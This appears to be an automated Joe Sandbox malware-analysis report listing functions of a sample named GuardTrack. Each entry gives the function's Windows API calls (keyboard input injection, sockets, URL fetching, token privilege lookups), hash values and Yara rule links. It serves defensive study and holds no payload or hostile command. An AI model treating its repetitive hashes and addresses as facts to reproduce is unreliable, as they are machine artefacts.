Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction ID: b4129b3e72128de54f8d4ed2799f3bae4dfd6f1e12a7c9c081e3411ad815e560
Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
Instruction Fuzzy Hash: 9E41A23160064AABDF388FAEC8949AF7FA6BF80360B24856FE85987740D7709D418F44

Function 0060A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0060A68A
__itow.LIBCMT ref: 0060A6BB

Part of subcall function 0060A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0060A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0060A724
__itow.LIBCMT ref: 0060A77B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 4bd0fb76f7f33168d0a84ae94abcceceaa01ec98b2e045ed6e1f4308d3d98ab1
Instruction ID: bfb7db6f4ca83fc334fde5b77827f1670bc5ee274bd582634a97cde73a1a6e00
Opcode Fuzzy Hash: 4bd0fb76f7f33168d0a84ae94abcceceaa01ec98b2e045ed6e1f4308d3d98ab1
Instruction Fuzzy Hash: 65417F75A40309AFDF15DFA4C849FEF7FBAAB85790F040019F905A3282DB709945CAA6

Function 00627095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 006270BC
WSAGetLastError.WSOCK32(00000000), ref: 006270CC

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00627130
WSAGetLastError.WSOCK32(00000000), ref: 0062713C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: d0f1bbb997dde255b7f26b44e48b2cd9bfbeef7859358a07142259f85ffdd770
Instruction ID: 6bee735d91cacbe22a131174a2db58f1f511d0ffaf39653de61b69fd0d1b5f76
Opcode Fuzzy Hash: d0f1bbb997dde255b7f26b44e48b2cd9bfbeef7859358a07142259f85ffdd770
Instruction Fuzzy Hash: 5341A0757406116FEB24AF24DC8AFAA7BA5EF44B10F048458FA599B3C3DA70AC018F91

Function 00626B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00640980), ref: 00626B92
_strlen.LIBCMT ref: 00626BC4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 302aa638b3b1b9aaff98f6c0e0ede9d9a3fa8e1d837e19934d42790411dff8a8
Instruction ID: 386d883f20d2d132a68ad9274a41445998be06c9dd3ddfe665ef27b0ed5fc878
Opcode Fuzzy Hash: 302aa638b3b1b9aaff98f6c0e0ede9d9a3fa8e1d837e19934d42790411dff8a8
Instruction Fuzzy Hash: 9641E531600519AFCB14FBA4DC99FEEB7AAFF94310F148159F91A97292DB30AD11CB90

Function 0061BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0061BEE1
GetLastError.KERNEL32(?,00000000), ref: 0061BF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0061BF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0061BF58

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 31100511950509669dfb5df26b290334abe57fb9c781cc3d6d0959d1371c6e33
Instruction ID: 65cf19a6a147cea6ca32e6167e13c404cb6ce205d4389ffc086047108ce9cb66
Opcode Fuzzy Hash: 31100511950509669dfb5df26b290334abe57fb9c781cc3d6d0959d1371c6e33
Instruction Fuzzy Hash: 4941E939600611DFCB21EF15C589A99BBF2FF89310B198488E9499B362CB71FD42CF91

Function 00638E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00638F03

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b83d37bebcb38766d4f5a359d2be10a75c24504e6bdcf574ce93a7446fbc9af5
Instruction ID: edc8e4f5e478a90dcf2cedc1d35aed2c2380b68c4817767702a684d4b6c62f42
Opcode Fuzzy Hash: b83d37bebcb38766d4f5a359d2be10a75c24504e6bdcf574ce93a7446fbc9af5
Instruction Fuzzy Hash: E231AF34604319AFEF249A18CC49FE837A7EB063A0F244519FA15D72E1DF75E9908AD1

Function 0063B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0063B1D2
GetWindowRect.USER32(?,?), ref: 0063B248
PtInRect.USER32(?,?,0063C6BC), ref: 0063B258
MessageBeep.USER32(00000000), ref: 0063B2C9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 413ca1a5c69edbb3e2bb4ea3814c57df1a0875db14bbb2e8f7a4f210d4afb964
Instruction ID: a4400c10d333185a820ffd6d3e62cd239dab75c6577a4322ac8a2867c466268c
Opcode Fuzzy Hash: 413ca1a5c69edbb3e2bb4ea3814c57df1a0875db14bbb2e8f7a4f210d4afb964
Instruction Fuzzy Hash: AA415E30A04115DFDB15CF58C884AAE7BF6FF49310F18A2A9EA289B251D730EA51CF91

Function 006112D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00611326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00611342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006113A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006113FA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 00cbd6dba61c6fcbde741045ebcfd16910e24802d1d17c120bc08f0811c31110
Instruction ID: b7a671c96dbe8ee21b4e300c7a79d8416e20335dc52abf49ad01b31c3d7279e1
Opcode Fuzzy Hash: 00cbd6dba61c6fcbde741045ebcfd16910e24802d1d17c120bc08f0811c31110
Instruction Fuzzy Hash: 3B314B30944618AEFF3486258C05BFDBBBBAB47310F0C821AE6A05A7D9D37489C19B55

Function 00611410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00611465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00611481
PostMessageW.USER32(00000000,00000101,00000000), ref: 006114E0
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00611532

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8449acdfedb8d4a360bec416120c77e2493fff886baf77da1d0d2657ac6daa04
Instruction ID: cada53f118441e89808a68617cbf256c773fe766313bee654b74038f10e94174
Opcode Fuzzy Hash: 8449acdfedb8d4a360bec416120c77e2493fff886baf77da1d0d2657ac6daa04
Instruction Fuzzy Hash: 433148709402185EFF34CA658C04BFEBBF7AB87710F0C431AE6815A2D1C37889D29BA1

Function 005E63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005E642B
__isleadbyte_l.LIBCMT ref: 005E6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005E6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005E64BD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1ce09fa9acad33b6a3f28ca6f6d60c3fd3df88922674b186d937dd4307a47395
Instruction ID: dbd850ce47c77ca72a7b2a3816c7d37500ae6e17b8523605a7e3d7bce013581a
Opcode Fuzzy Hash: 1ce09fa9acad33b6a3f28ca6f6d60c3fd3df88922674b186d937dd4307a47395
Instruction Fuzzy Hash: 1E31D031600296AFDF298F66CC88BAA7FA5FF513E0F154429E8A4871D1EB31E950DB50

Function 0063552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0063553F

Part of subcall function 00613B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00613B4E
Part of subcall function 00613B34: GetCurrentThreadId.KERNEL32 ref: 00613B55
Part of subcall function 00613B34: AttachThreadInput.USER32(00000000,?,006155C0), ref: 00613B5C

GetCaretPos.USER32(?), ref: 00635550
ClientToScreen.USER32(00000000,?), ref: 0063558B
GetForegroundWindow.USER32 ref: 00635591

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: eaa97ce6c1c08f3532bfad8e05ce237698b6f1a368a37c298a8781e03ae4ebf3
Instruction ID: 4a5a475f4bd7fb378008fcbcdc38f74e15fb6dfa692b4b47b8294a441a4748ff
Opcode Fuzzy Hash: eaa97ce6c1c08f3532bfad8e05ce237698b6f1a368a37c298a8781e03ae4ebf3
Instruction Fuzzy Hash: E0315071D00119AFDB10EFB5C8859EFB7FAEF98304F10446AE501E7242EA71AE408FA0

Function 0063CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

GetCursorPos.USER32(?), ref: 0063CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005EBCEC,?,?,?,?,?), ref: 0063CB8F
GetCursorPos.USER32(?), ref: 0063CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005EBCEC,?,?,?), ref: 0063CC16

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 173782414ce1e0674bf7bb7d14291f5d2b7c6ac51474d7a8c0aa0e94997b6e14
Instruction ID: 04e574094e9dfd3319d512d5b676227f4166891160d93229ef60e783ce612d67
Opcode Fuzzy Hash: 173782414ce1e0674bf7bb7d14291f5d2b7c6ac51474d7a8c0aa0e94997b6e14
Instruction Fuzzy Hash: 56318F39600158AFCB158F58C859EFABBF6EB49320F0440A9F90AA7361C7316D51EFA0

Function 005D0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 005D0BE2

Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065

_fprintf.LIBCMT ref: 005D0C19
OutputDebugStringW.KERNEL32(?), ref: 0060694C

Part of subcall function 005D4CCA: _flsall.LIBCMT ref: 005D4CE3

__setmode.LIBCMT ref: 005D0C4E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 75f2891e2ff2cef6cedf7dcb238b3598cd9f58972e1efcc8d140ff1b0f4dd9df
Instruction ID: c12b4748074d103ff8f5b13f9bfaef66914f1c5043d049bfe995f72874d3ecb3
Opcode Fuzzy Hash: 75f2891e2ff2cef6cedf7dcb238b3598cd9f58972e1efcc8d140ff1b0f4dd9df
Instruction Fuzzy Hash: C611F6319041066FD728B7A8984AAFEBF6ABF81310F14011BF204573D2DE715D924BA1

Function 00609274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00608D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00608D3F
Part of subcall function 00608D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00608D49
Part of subcall function 00608D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D58
Part of subcall function 00608D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D5F
Part of subcall function 00608D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006092C1
_memcmp.LIBCMT ref: 006092E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0060931A
HeapFree.KERNEL32(00000000), ref: 00609321

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 10bf3ede92da7ff0c1717bfb7794d57e7db78df9530d35ab1766514acb94caeb
Instruction ID: d20a4ee66c21407622c7d9cb2d22a3d3f3b6d92f06d11d671485b1c98891663d
Opcode Fuzzy Hash: 10bf3ede92da7ff0c1717bfb7794d57e7db78df9530d35ab1766514acb94caeb
Instruction Fuzzy Hash: 42218C31E80109EFDB18DFA4C945BEEB7BAEF45301F044099E894A7292D770AA04CFA0

Function 00621E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00621E6F

Part of subcall function 00621EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00621F18
Part of subcall function 00621EF9: InternetCloseHandle.WININET(00000000), ref: 00621FB5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 762bb19ad2aa62e8ee9158df10c9be37d18c296826d85cc03c6f472947295280
Instruction ID: 375d9c1e7cab6c7f2292d8fc181743577c6b99150019fa7039865953c49ebc92
Opcode Fuzzy Hash: 762bb19ad2aa62e8ee9158df10c9be37d18c296826d85cc03c6f472947295280
Instruction Fuzzy Hash: 3421C235204A25BFEB119F60AC00FBBB7ABBF95700F114019FE919A650DB71E8119F95

Function 00613F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00642C4C), ref: 00613F57
GetLastError.KERNEL32 ref: 00613F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00613F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00642C4C), ref: 00613FD2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 0a4cf1c6a572b45d609a70cd6715bdd80ce682b6a06815894737e21dc73d0c76
Instruction ID: f4731c52f511d9ecff7e0dbed149449afb2b6cf74aa55df2f29a246fd63d9850
Opcode Fuzzy Hash: 0a4cf1c6a572b45d609a70cd6715bdd80ce682b6a06815894737e21dc73d0c76
Instruction Fuzzy Hash: E121A6749082219F8700DF68C8859EABBF9FE56364F14461DF496C73A2D730DA87CB42

Function 0063634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006363BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006363D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006363E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006363F3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: e49009dac1f10ecd11d8a1b85c513f90d700181c4f56877242f3c9e5b46bc516
Instruction ID: f16d14351cc8577505438ff36bf86a2856bd133cb8c237e1e7063f0fe1814944
Opcode Fuzzy Hash: e49009dac1f10ecd11d8a1b85c513f90d700181c4f56877242f3c9e5b46bc516
Instruction Fuzzy Hash: 5611B135305524AFE704AB24DC59FBA7B9AEF86320F149118FA16CB2D2CB74BD018BD5

Function 0060E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0060E46F,?,?,?,0060F262,00000000,000000EF,00000119,?,?), ref: 0060F867
Part of subcall function 0060F858: lstrcpyW.KERNEL32(00000000,?), ref: 0060F88D
Part of subcall function 0060F858: lstrcmpiW.KERNEL32(00000000,?,0060E46F,?,?,?,0060F262,00000000,000000EF,00000119,?,?), ref: 0060F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0060F262,00000000,000000EF,00000119,?,?,00000000), ref: 0060E488
lstrcpyW.KERNEL32(00000000,?), ref: 0060E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0060F262,00000000,000000EF,00000119,?,?,00000000), ref: 0060E4E2

Strings

cdecl, xrefs: 0060E4D9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

